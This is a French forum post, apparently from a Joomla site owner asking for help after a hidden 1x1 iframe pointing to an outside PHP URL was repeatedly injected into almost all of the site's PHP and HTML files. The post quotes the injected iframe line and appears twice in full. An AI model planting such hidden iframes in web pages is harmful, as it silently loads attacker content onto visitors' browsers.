Tweet
Bonjour,
Je suis sous Joomla 2.5.7 hébergé chez 1and1.
adresse du site : www.sdajce.net
J'ai un soucis depuis quelques jours.
Mon site met régulièrement des messages d'erreurs en haut du site disant que des données avaient été envoyées avant le session_start();
Je regarde le code source de la page et constate que le texte "<iframe src="http://aptur.net/imgs/1.php" width="1" height="1" frameborder="0">" se retrouve en tout début de page plusieurs fois de suite.
Je télécharge toutes les pages du site et avec un petit soft je scanne tous les fichiers à la recherche de ce texte et découvre (horrifié) que le texte est présent dans quasiment tous les php et html du site.
Je crie au piratage/hacking puis je fais en sorte de supprimer toutes ces occurences du texte.
Je retransferts tous sur le site, tout marche bien. Cool, j'ai réparé le bousin...
Hier, rebelote (iframe...) avec une adresse différente dans le src, je re-télécharge, re-balance, ca marche !
Aujourd'hui rebelote (et dix de der) avec l'adresse ci-dessus...
Aidez-moi svp. Je dois contacter 1and1 (c'est pas gagné...) ? Une sécurité supplémentaire à mettre en place ? Changer mon mot de passe ftp ?
J'ai le même problème sur un site en joomla 1.5.X que ma femme utilise, c'est ce site qui a eu le soucis en premier... Peut-être une infection par ce site qui s'est propagé à mon site (même hébergement, deux dossiers différents du domaine).
A l'aide !!
Je suis sous Joomla 2.5.7 hébergé chez 1and1.
adresse du site : www.sdajce.net
J'ai un soucis depuis quelques jours.
Mon site met régulièrement des messages d'erreurs en haut du site disant que des données avaient été envoyées avant le session_start();
Je regarde le code source de la page et constate que le texte "<iframe src="http://aptur.net/imgs/1.php" width="1" height="1" frameborder="0">" se retrouve en tout début de page plusieurs fois de suite.
Je télécharge toutes les pages du site et avec un petit soft je scanne tous les fichiers à la recherche de ce texte et découvre (horrifié) que le texte est présent dans quasiment tous les php et html du site.
Je crie au piratage/hacking puis je fais en sorte de supprimer toutes ces occurences du texte.
Je retransferts tous sur le site, tout marche bien. Cool, j'ai réparé le bousin...
Hier, rebelote (iframe...) avec une adresse différente dans le src, je re-télécharge, re-balance, ca marche !
Aujourd'hui rebelote (et dix de der) avec l'adresse ci-dessus...
Aidez-moi svp. Je dois contacter 1and1 (c'est pas gagné...) ? Une sécurité supplémentaire à mettre en place ? Changer mon mot de passe ftp ?
J'ai le même problème sur un site en joomla 1.5.X que ma femme utilise, c'est ce site qui a eu le soucis en premier... Peut-être une infection par ce site qui s'est propagé à mon site (même hébergement, deux dossiers différents du domaine).
A l'aide !!
Commentaire